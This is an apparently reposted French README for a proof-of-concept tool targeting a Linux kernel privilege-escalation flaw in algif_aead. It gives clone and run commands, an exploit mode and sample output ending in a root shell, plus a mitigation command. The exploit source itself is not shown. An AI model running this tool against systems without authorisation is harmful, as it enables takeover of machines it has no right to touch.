## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-LUTFIFAKEE-PROJECT-CVE-2026-31431
# CVE-2026-31431 « Copy Fail » - Outil de Recherche & de Test d'Intrusion
   
* * *
# ⚠️ AVERTISSEMENT
Ce projet est fourni strictement pour :
* Recherche en sécurité
* Fins éducatives
* Tests d'intrusion autorisés
* Environnements CTF et de laboratoire
## En utilisant cet outil, vous acceptez que :
* Vous possédez le système cible **ou**
* Vous avez une autorisation écrite explicite pour tester la cible
* Vous n'utiliserez pas ce projet pour des activités illégales ou malveillantes
* Vous comprenez toutes les conséquences légales et éthiques d'un accès non autorisé
L'auteur et les contributeurs **ne sont PAS responsables** de toute utilisation abusive, des dommages, pertes de données, interruption de service ou activités illégales réalisées avec ce logiciel.
* * *
# đź“– Description
Outil de recherche de preuve de concept pour **CVE-2026-31431** , également connu sous le nom de **« Copy Fail »** , une vulnérabilité du noyau Linux affectant l'implémentation AEAD `algif_aead` / `authencesn`.
La vulnérabilité pourrait permettre une corruption du cache de pages dans des conditions spécifiques, conduisant potentiellement à une élévation de privilèges locaux sur les systèmes vulnérables.
* **Systèmes concernés :** Noyau Linux 4.17+ (avant les correctifs de sécurité d'avril 2026)
* **Sévérité :** Élevée
* **Score CVSS :** 7.8
* * *
# ✨ Fonctionnalités
* 🔍 Détection non destructive de vulnérabilité
* ⚡ Test d'élévation de privilèges locaux
* đź§ą Routine de nettoyage et de restauration
* đź“„ Interface en ligne de commande simple
* 🛡️ Flux de travail axé sur la recherche
* * *
# 📦 Installation
Clonez le dépôt :
root@kitploit:~
git clone https://github.com/Lutfifakee-Project/CVE-2026-31431.git
cd CVE-2026-31431
* * *
# 🚀 Utilisation
## Vérifier si le système est vulnérable
root@kitploit:~
python3 exploit.py
## Exécuter un test d'exploitation autorisé
root@kitploit:~
python3 exploit.py --exploit
Lorsque invité :
root@kitploit:~
Type 'YES' to continue
## Nettoyage après le test
root@kitploit:~
python3 exploit.py --cleanup
## Afficher le menu d'aide
root@kitploit:~
python3 exploit.py --help
* * *
# 📸 Exemple de sortie
root@kitploit:~
$ python3 exploit.py --exploit
[!] DANGER ZONE: Exploit mode
Type 'YES' to continue: YES
[*] CVE-2026-31431 Copy Fail Exploit
[+] Page cache patching complete!
[+] Executing modified su...
# id
uid=0(root) gid=1001(user)
* * *
# 🛡️ Atténuation
Si vous êtes administrateur système et devez atténuer l'exposition :
## Désactiver le module vulnérable
root@kitploit:~
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
sudo rmmod algif_aead 2>/dev/null
* * *
# 📚 Références
* Détails CVE : https://nvd.nist.gov/vuln/detail/CVE-2026-31431
* Divulgation : https://copy.fail